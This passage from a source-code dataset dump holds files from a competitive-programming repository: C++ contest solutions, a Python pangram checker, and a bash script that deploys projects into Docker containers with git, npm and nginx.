2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.48233774304389954, "alphanum_fraction": 0.49184367060661316, "avg_line_length": 35.25957489013672, "blob_id": "18d7db404a306b9070ac5c984236dfcc5e053367", "content_id": "8df73247fc6992b06c6c384f07094a20790fd0ce", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 8521, "license_type": "no_license", "max_line_length": 163, "num_lines": 235, "path": "/CodeForce/1014/A2.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version 
from 13 October 2017. C++17 version {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define SZ(a) (int(a.size()))\n#define contains(s, value) (s.find(value) != s.end())\n\n#define ints(a...) int a; readln(a)\n#define strings(a...) string a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n \nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n \nvoid writeln(){cout<<\"\\n\";}ttti void print(T a);ttti void priws(T a);ttti void read(T& a);\nttta void readln(Args&... 
args){(read(args),...);}tthti void writeln(H h,T...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//}}}\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nvoid run()\n{\n ints(n, s, c, h, u);\n strings(pattern, bottles);\n cerr.precision(7);\n cerr << fixed;\n vector<int> next(2 * n);\n\n { //{{{\n string dpattern = pattern + pattern;\n map<char, int> last;\n fori(n * 2)\n {\n if (contains(last, dpattern[i]))\n next[last[dpattern[i]]] = i;\n last[dpattern[i]] = i;\n }\n } //}}}\n auto getPatternColor = [&](int position) {\n return pattern[position % n];\n };\n auto getNextColor = [&](int index) {\n int mod = index % n;\n int real = index - mod;\n return real + next[mod];\n };\n\n auto getAnswer = [&](int runNumber) {\n double time = clock();\n set<int> hams;\n map<int, int> numbers;\n fori(u) hams.insert(i), numbers[i] = i;\n string currentBottles = bottles.substr(0, h);\n int nextBottle = h;\n vector<pair<int, char>> actions;\n\n auto getNextBottle = [&]() {\n if (nextBottle >= SZ(bottles))\n return '*';\n return bottles[nextBottle++];\n };\n auto useBottle = [&](int index) {\n auto temp = getNextBottle();\n if (temp == '*')\n currentBottles.erase(index);\n else\n currentBottles[index] = temp;\n };\n auto getFreePlace = [&](int position, char color) {\n position++;\n while (getPatternColor(position) != color) ++position;\n while (contains(hams, position)) position = getNextColor(position);\n return position;\n };\n auto getFreeHams = [&](int position, char color) {\n set<int> ans = hams;\n ans.erase(position);\n 
position++;\n while (getPatternColor(position) != color) ++position;\n while (contains(hams, position)) ans.erase(position), position = getNextColor(position);\n return ans;\n };\n\n auto shoot = [&](int position, int bottle, int nextPlace) {\n hams.erase(position);\n actions.emplace_back(numbers[position], currentBottles[bottle]);\n hams.insert(nextPlace);\n numbers[nextPlace] = numbers[position];\n numbers.erase(position);\n useBottle(bottle);\n };\n auto getBottleIndex = [&](int position, bool force) -> pii {\n set<char> used = {'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J'};\n int mx = 0;\n int index = -1;\n int i = 0;\n for (char c: currentBottles)\n {\n if (contains(used, c))\n if (int nextPlace = getFreePlace(position, c); nextPlace > mx)\n mx = nextPlace,\n index = i;\n ++i;\n used.erase(c);\n }\n //if (false)\n if (!force && nextBottle < SZ(bottles))\n {\n int iii = 2;//runNumber % 3 + 1;\n //runNumber % 15 < 3 ? 1 :\n //runNumber % 15 < 13 ? 2 :\n //(1 + rand() % 2);\n string&& temp = bottles.substr(nextBottle, iii);\n for (char c: temp)\n if (contains(used, c))\n if (int nextPlace = getFreePlace(position, c); nextPlace > mx)\n return {-1, c};\n }\n return {index, mx};\n };\n\n fori(s)\n {\n int bottleIndex, nextPlace;\n int found = -1;\n for (int ham: hams)\n {\n tie(bottleIndex, nextPlace) = getBottleIndex(ham, false);\n if (bottleIndex != -1)\n {\n found = ham;\n break;\n }\n }\n if (found == -1)\n {\n int first = *hams.begin();\n auto [bi, color] = getBottleIndex(first, false);\n auto free = getFreeHams(first, color);\n\n if (SZ(free) == 0)\n {\n int index = rand() % SZ(hams);\n found = *hams.begin();\n index %= 2;\n for (auto it = hams.begin(); index-- > 0; found = *(++it));\n tie(bottleIndex, nextPlace) = getBottleIndex(found, true);\n }\n else\n {\n int index = rand() % SZ(free);\n found = *free.begin();\n index %= 4;\n for (auto it = free.begin(); index-- > 0; found = *(++it));\n tie(bottleIndex, nextPlace) = getBottleIndex(found, true);\n }\n 
}\n shoot(found, bottleIndex, nextPlace);\n }\n double in = clock() - time;\n#ifndef ONLINE_JUDGE\n //cerr << \"Done in \" << in / CLOCKS_PER_SEC << \" secs (\" << *hams.begin() << \")\\n\";\n#endif\n return tuple(in, *hams.begin(), actions);\n };\n\n double time = clock();\n double TL = 15;\n int runNumber = 0;\n auto [tm, ans, actions] = getAnswer(runNumber++);\n\n while ((clock() - time + tm * 2) / CLOCKS_PER_SEC < TL)\n if (auto [_, tempAns, tempActions] = getAnswer(runNumber++); tempAns > ans)\n ans = tempAns,\n actions = tempActions;\n cerr << ans << \"\\n\";\n#ifdef ONLINE_JUDGE\n writeln(actions);\n#endif\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5009862184524536, "alphanum_fraction": 0.516765296459198, "avg_line_length": 20.08333396911621, "blob_id": "8e41a5136b57cd9e361dca80a8149eaddbf8d2d2", "content_id": "08688dc6f9094f471880f9503fc4f51462aa468a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 573, 
"license_type": "no_license", "max_line_length": 41, "num_lines": 24, "path": "/2023/tin/1.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\nttt = 'йцукенгшщзхъэждлорпавыфячсмитьбюё'\nsss = 'ЙЦУКЕНГШЩЗХЪЭЖДЛОРПАВЫФЯЧСМИТЬБЮЁ'\n\ndef get(c):\n for i in range(33):\n if ttt[i] == c or sss[i] == c:\n return i\n return -1\n\ndef is_pangram(text: str) -> bool:\n a = [False] * 33\n for c in text:\n d = get(c)\n if d != -1:\n a[d] = True\n for i in range(33):\n if not a[i]:\n return False\n return True\n\n\nif __name__ == \"__main__\":\n input_str = input()\n print(is_pangram(input_str))\n" }, { "alpha_fraction": 0.5378863215446472, "alphanum_fraction": 0.5555832386016846, "avg_line_length": 36.14814758300781, "blob_id": "6ba1d75262fb1404eb477037bfbd74f64dd1263b", "content_id": "09ebbafe6b2c7d470602f081cb36a55989e68ea1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4012, "license_type": "no_license", "max_line_length": 174, "num_lines": 108, "path": "/2020/gcj2/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(a.size())\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//printTuple\ntemplate<class Tuple, size_t... Is> ostream& print_tuple(ostream& os, const Tuple& t, index_sequence<Is...>) { ((os << (Is == 0 ? \"\" : \" \") << get<Is>(t)), ...); return os; }\ntemplate<class Tuple, size_t... Is> istream& read_tuple(istream& is, Tuple& t, index_sequence<Is...>) { ((is >> get<Is>(t)), ...); return is; }\ntemplate<class... Args> inline ostream& operator<<(ostream& os, const tuple<Args...>& t) { return print_tuple(os, t, index_sequence_for<Args...>{}); }\ntemplate<class... Args> inline istream& operator>>(istream& is, tuple<Args...>& t) { return read_tuple(is, t, index_sequence_for<Args...>{}); }\n\n//binSearch\n//x -> min, f(x) == true\ntemplate<typename T, typename F>\nT binSearch(T l, T r, F f, T eps = 1)\n{\n T m;\n while (abs(r - l) > eps)\n m = l + (r - l) / 2,\n (f(m) ? r : l) = m;\n return f(l) ? l : r;\n}\n\n//debug\nvector<string>split(string&s,const string& d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\n//}}}\n\ntuple<ll, ll, ll> run()\n{\n ll l, r;\n readln(l, r);\n ll start = 1;\n ll n = 0;\n while (true)\n {\n if (start > max(l, r)) break;\n\n ll mx = max(l, r) - min(l, r);\n if (start > mx)\n {\n n++;\n (l >= r ? 
l : r) -= start;\n start++;\n continue;\n }\n\n auto get = [](ll x) { return x * (x + 1) / 2; };\n ll x = binSearch(start, mx + 1, [&](ll m) {\n return get(m) - get(start - 1) > mx;\n });\n ll temp = get(x - 1) - get(start - 1);\n n += x - start;\n start = x;\n (l >= r ? l : r) -= temp;\n }\n return {n, l, r};\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t);\n fori(t)\n cout << \"Case #\" << (i + 1) << \": \" << run() << \"\\n\";\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5067257285118103, "alphanum_fraction": 0.518278181552887, "avg_line_length": 33.91160202026367, "blob_id": "a440f61a705e8ebbde658817dc02337bce743bb3", "content_id": "e74124c875187e5204a2f8f77bb6e68d99e5d0d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 6319, "license_type": "no_license", "max_line_length": 252, "num_lines": 181, "path": "/scripts/test.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# [{\n# type: front,\n# name: damosFront,\n# container: nginx,\n# rep: 
http://bitbucket.org/konekon/1705-front-end.git,\n# server: http://konekon.ru/damos/ #Backand URL\n# host: 1705.konekon.ru, #Virtual host from internet\n# }, {\n# type: node,\n# name: damosNode,\n# container: node, #Default: type\n# rep: http://bitbucket.org/konekon/1705-back-end.git,\n# server: http://konekon.ru/, #Server, backend is on\n# host: damos, #Backend will be available on $server:81/$host\n# port: 20000, #Port. It should be autogenerated(cauze doesn't have any meaning. But later)\n# arguments: \"DATABASE='mysql://.....'\" #Arguments to nodeJS on startup: $arguments node --harmony bin/www. Env with mode and host/port is already defined\n# }]\n\n#Staff #{{{\nsettings=\"/home/igorjan/settings.json\"\nif [ ! -f $settings ]; then\n echo '[]' > \"$settings\"\nfi\n\nprojects=`jq '.' $settings`\n\nfail () {\n echo \"$1\"\n exit 1\n}\n\nusage () {\n cat $settings\n exit 0\n}\n\ntoNamedParams () {\n type=$1\n name=$2\n container=$3\n rep=$4\n server=$5\n host=$6\n port=$7\n arguments=$8\n folder=$9\n script=${10}\n branch=${11}\n if [ ! \"$container\" ]; then container=\"$type\"; fi\n}\n\naddProject () {\n toNamedParams \"$@\"\n projects=`echo $projects | jq \". 
+ [{\n \\\"type\\\": \\\"$type\\\",\n \\\"name\\\": \\\"$name\\\",\n \\\"container\\\": \\\"$container\\\",\n \\\"rep\\\": \\\"$rep\\\",\n \\\"server\\\": \\\"$server\\\",\n \\\"host\\\": \\\"$host\\\",\n \\\"port\\\": \\\"$port\\\",\n \\\"arguments\\\": \\\"$arguments\\\",\n \\\"folder\\\": \\\"$folder\\\",\n \\\"script\\\": \\\"$script\\\",\n \\\"branch\\\": \\\"$branch\\\"\n}]\"`\n}\n\ngetProjectByName () {\n found=`echo $projects | jq \"map(select(.name == \\\"$1\\\"))[]\"`\n foundName=`echo $found | jq -r '.name'`\n foundType=`echo $found | jq -r '.type'`\n foundContainer=`echo $found | jq -r '.container'`\n foundRep=`echo $found | jq -r '.rep'`\n foundServer=`echo $found | jq -r '.server'`\n foundHost=`echo $found | jq -r '.host'`\n foundPort=`echo $found | jq -r '.port'`\n foundArguments=`echo $found | jq -r '.arguments'`\n foundFolder=`echo $found | jq -r '.folder'`\n foundScript=`echo $found | jq -r '.script'`\n foundBranch=`echo $found | jq -r '.branch'`\n unset found\n if [ \"$foundType\" != \"\" ]; then found=true; fi\n}\n\ndeleteProjectByName () {\n projects=`echo $projects | jq \"map(select(.name != \\\"$1\\\"))\"`\n}\n\ncheckType () {\n if [ \"$1\" == \"node\" ] || [ \"$1\" == \"front\" ] || [ \"$1\" == \"tarantool\" ] || [ \"$1\" == \"python\" ]; then return; fi\n fail \"Incorrect type!\"\n}\n\n\n\n\n\n#}}}\n\n#Options #{{{\nOPTS=`getopt -o ht:n:c:r:s:h:p:a:f:b: -l type:,name:,container:,rep:,repository:,server:,host:,port:,arguments:,folder:,script:,branch:,help -- \"$@\"`\nif [ $? 
!= 0 ]; then exit 1; fi\neval set -- \"$OPTS\"\n\n#parsing arguments\nwhile true ; do\n case \"$1\" in\n --help ) usage ;shift;;\n\n -t | --type ) type=$2 ;shift 2;;\n -n | --name ) name=$2 ;shift 2;;\n -c | --container ) container=$2 ;shift 2;;\n -r | --rep | --repository ) rep=$2 ;shift 2;;\n -s | --server ) server=$2 ;shift 2;;\n -h | --host ) host=$2 ;shift 2;;\n -p | --port ) port=$2 ;shift 2;;\n -a | --arguments ) arguments=$2 ;shift 2;;\n -f | --folder ) folder=$2 ;shift 2;;\n -b | --branch ) branch=$2 ;shift 2;;\n --script ) script=$2 ;shift 2;;\n\n -- ) shift; break;;\n esac\ndone #}}}\n\n#Parsing # {{{\nif [ \"$1\" == \"create\" ]; then # {{{\n if [ ! \"$name\" ] || [ ! \"$type\" ] || [ ! \"$rep\" ]; then fail \"Type and name and rep are required!\"; fi\n case \"$name\" in\n *\\ *) fail 'Name cannot contain spaces!';;\n esac\n\n getProjectByName \"$name\"\n if [ \"$found\" ]; then fail \"Project already exists!\"; fi\n checkType $type\n\n if [ ! \"$branch\" ]; then branch=\"master\"; fi\n addProject \"$type\" \"$name\" \"$container\" \"$rep\" \"$server\" \"$host\" \"$port\" \"$arguments\" \"$folder\" \"$script\" \"$branch\"\n if [ \"$type\" == \"front\" ]; then #{{{\n docker exec -ti \"$container\" bash -c \"mkdir -p /home/nesuko && cd /home/nesuko && rm -rf $name && git clone $rep $name && cd $name && git checkout $branch && npm i && bower i -F --allow-root\"\n docker exec -ti \"$container\" bash -c \"rm -rf /var/www/$name && mkdir -p /var/www/$name\"\n docker exec -ti \"$container\" bash -c \"cd /home/nesuko/$name && SRV=$server npm run $script && cp -r /home/nesuko/$name/$folder /var/www/$name\"\n docker exec -ti \"$container\" bash -c \"echo -e \\\"server {\n listen 80;\n\n server_name $host;\n root /var/www/$name/$folder;\n index index.html index.htm;\n\n location / {\n allow all;\n try_files \\\"'$'\\\"uri \\\"'$'\\\"uri/ /index.html =404;\n }\n}\\\" > /etc/nginx/sites-available/$host\"\n docker exec -ti \"$container\" bash -c \"ln -fs 
/etc/nginx/sites-available/$host /etc/nginx/sites-enabled/$host\"\n docker kill -s HUP $container\n#}}}\n fi #}}}\n# }}}\n\nelif [ \"$1\" == \"pull\" ]; then # {{{\n if [ ! \"$name\" ]; then fail \"Name is required!\"; fi\n getProjectByName \"$name\"\n if [ ! \"$found\" ]; then fail \"Project with name '$name' is not found!\"; fi\n\n if [ $foundType == \"front\" ]; then\n\tif [ \"$branch\" ]; then foundBranch=\"$branch\"; fi\n\tif [ ! \"$foundBranch\" ]; then foundBranch=\"master\"; fi\n docker exec -ti $foundContainer bash -c \"cd /home/nesuko/$foundName && git stash && git checkout $foundBranch && git pull && npm i --all && SRV=$foundServer npm run $foundScript && cp -r /home/nesuko/$foundName/$foundFolder /var/www/$foundName\"\n elif [ \"$foundType\" == \"python\" ]; then\n cd /home/igorjan/$foundName && git pull && docker exec -ti \"$foundContainer\" bash -c \"pip install -r requirements.txt\"\n docker exec -ti \"$foundContainer\" bash -c \"./manage.py migrate\"\n docker restart \"$foundContainer\"\n fi\nfi #}}}\n# }}}\n\n# echo \"$projects\"\necho \"$projects\" > $settings\n" }, { "alpha_fraction": 0.3619847297668457, "alphanum_fraction": 0.382595419883728, "avg_line_length": 31.266010284423828, "blob_id": "be11bdc271c954376ca04102148a351d0565df93", "content_id": "088fae58ef42d367c3eaa52515b44cd69a5661f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6550, "license_type": "no_license", "max_line_length": 174, "num_lines": 203, "path": "/CodeForce/1333/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. 
C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... 
args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n);\n if (n <= 2)\n return writeln(-1);\n if (n == 3)\n {\n vector<vector<int>> e = {{1, 2, 4}, {5, 3, 8}, {9, 6, 7}};\n return writeln(e);\n vector<int> a(9);\n iota(all(a), 1);\n do\n {\n int q = 0;\n int r = 0;\n auto get = [&](int i, int j) {\n return a[i * 3 + j];\n };\n vector<vector<bool>> rook(3, {false, false, false});\n vector<vector<bool>> queen(3, {false, false, false});\n auto getMin = [&](vector<vector<bool>>& used) {\n pii ans = {-1, -1};\n int mn = 100;\n fori(n)\n forj(n)\n if (!used[i][j] && mn > get(i, j))\n mn = get(i, j),\n ans = {i, j};\n return ans;\n };\n auto getRook = [&](vector<vector<bool>>& used, int x, int y) {\n int mn = 100;\n pii ans = {-1, -1};\n fori(n)\n if (!used[x][i] && get(x, i) < mn)\n mn = get(x, i), ans = {x, i};\n fori(n)\n if (!used[i][y] && get(i, y) < mn)\n mn = get(i, y), ans = {i, y};\n return ans;\n };\n auto getQueen = [&](vector<vector<bool>>& used, int x, int y) {\n int mn = 100;\n pii ans = {-1, -1};\n fori(n)\n if (!used[x][i] && get(x, i) < mn)\n mn = get(x, i), ans = {x, i};\n fori(n)\n if (!used[i][y] && get(i, y) < mn)\n mn = get(i, y), ans = {i, y};\n fori(n)\n forj(n)\n if (i - j == x - y)\n if (!used[i][j] && get(i, j) < mn)\n mn = get(i, j), ans = {i, j};\n fori(n)\n forj(n)\n if (i + j == x + y)\n if (!used[i][j] && get(i, j) < mn)\n mn = get(i, j), ans = {i, j};\n return ans;\n };\n while (true)\n {\n auto [i, j] = getMin(rook);\n if (i == -1)\n break;\n rook[i][j] = true;\n r++;\n do\n {\n auto [ni, nj] = getRook(rook, i, j);\n if (ni == -1)\n break;\n i = ni;\n j = nj;\n rook[i][j] = true;\n }\n while (true);\n }\n writeln(a);\n while (true)\n {\n auto [i, j] = getMin(queen);\n if (i == -1)\n break;\n queen[i][j] = true;\n q++;\n do\n {\n auto [ni, nj] = getQueen(queen, i, j);\n if (ni == -1)\n break;\n i = ni;\n j = nj;\n 
queen[i][j] = true;\n writeln(queen);\n }\n while (true);\n }\n\n if (q > r)\n {\n writeln(q, r);\n writeln(a);\n return;\n }\n }\n while (next_permutation(all(a)));\n return writeln(a);\n }\n vector<vector<int>> a = {\n {4, 3, 6, 12},\n {7, 5, 9, 15},\n {14, 1, 11, 10},\n {13, 8, 16, 2}\n };\n if (n == 4)\n return writeln(a);\n vector<vector<int>> b(n, vector<int>(n));\n int c = 1;\n forn(q, n - 4)\n {\n if ((n - q) % 2 == 1)\n {\n ROF(j, n - 1, q)\n b[q][j] = c++;\n FOR(i, q + 1, n)\n b[i][q] = c++;\n }\n else\n {\n ROF(j, n - 1, q)\n b[j][q] = c++;\n FOR(i, q + 1, n)\n b[q][i] = c++;\n }\n\n if (q == n - 5)\n swap(b[n - 1][q], b[n - 2][q]);\n }\n fori(4)\n forj(4)\n b[i + n - 4][j + n - 4] = a[i][j] + (n * n - 16);\n\n writeln(b);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.40944716334342957, "alphanum_fraction": 0.4410082697868347, "avg_line_length": 22.371286392211914, "blob_id": "727c5c22dc55bdca470e63a4132a6c79ad2ac60a", "content_id": "4ac9a5a78bf3a4d3081dd26ee7a95a9d3289b3a9", "detected_licenses": [], 
"is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4721, "license_type": "no_license", "max_line_length": 262, "num_lines": 202, "path": "/CodeForce/0940/F_peanoOrder.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\ntypedef unsigned int uint;\ntypedef unsigned long long ull;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) 
int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\nstatic const auto IOSetup = [] {\n std::cin.tie(nullptr)->sync_with_stdio(false);\n // std::cout << std::setprecision(6) << std::fixed;\n return nullptr;}();\nstruct IOPre {static constexpr int TEN = 10, SZ = TEN * TEN * TEN * TEN;std::array<char, 4 * SZ> num;constexpr IOPre() : num{} {for (int i = 0; i < SZ; i++) {int n = i;for (int j = 3; j >= 0; j--) {num[i * 4 + j] = static_cast<char>(n % TEN + '0');n /= TEN;}}}};\n\nconst int N = 100010;\nconst int Q = 100010;\n \nint64_t peanoOrder(int x,int y,int z,int m) {\n vector<vector<int>> a(3, vector<int>(m));\n int sum0 = 0, sum1 = 0, sum2 = 0;\n int ptr = m-1;\n while (x) {\n a[0][ptr] = x%3;\n sum0 += a[0][ptr];\n ptr--;\n x /= 3;\n }\n ptr = m-1;\n while (y) {\n a[1][ptr] = y%3;\n sum1 += a[1][ptr];\n ptr--;\n y /= 3;\n }\n ptr = m-1;\n while (z) {\n a[2][ptr] = z%3;\n sum2 += a[2][ptr];\n ptr--;\n z /= 3;\n }\n \n for (int i = m-1; i >= 0; i--) {\n sum2 -= a[2][i];\n if ((sum0 + sum1)&1)\n a[2][i] = 2 - a[2][i];\n \n sum1 -= a[1][i];\n if ((sum0 + sum2)&1)\n a[1][i] = 2 - a[1][i];\n \n sum0 -= a[0][i];\n if ((sum1 + sum2)&1)\n a[0][i] = 2 - a[0][i];\n }\n \n int64_t num = 0, base = 1;\n for (int j = m-1; j >= 0; j--) {\n num += base * a[2][j];\n base *= 3;\n num += base * a[1][j];\n base *= 3;\n num += base * a[0][j];\n base *= 3;\n }\n return num;\n}\n\ntuple<int, int, int, int, int64_t> requests[Q];\narray<int, 3> updates[Q];\nint a[N];\nint ans[Q];\n\nmap<int, int> coords;\nint m[N * 3];\nint diffsCNT[N + 10];\nint n, q;\nint L = 0;\nint R = -1;\nint T = 0;\nint A = 0;\nint B = 0;\n\ninline void er(int x) {\n --diffsCNT[x];\n}\n\ninline void ad(int x) {\n ++diffsCNT[x];\n}\n\ninline void add(int id) {\n int x = a[id];\n er(m[x]);\n ad(++m[x]);\n}\n\ninline void del(int id) {\n int x = a[id];\n er(m[x]);\n ad(--m[x]);\n}\n\ninline void update(int 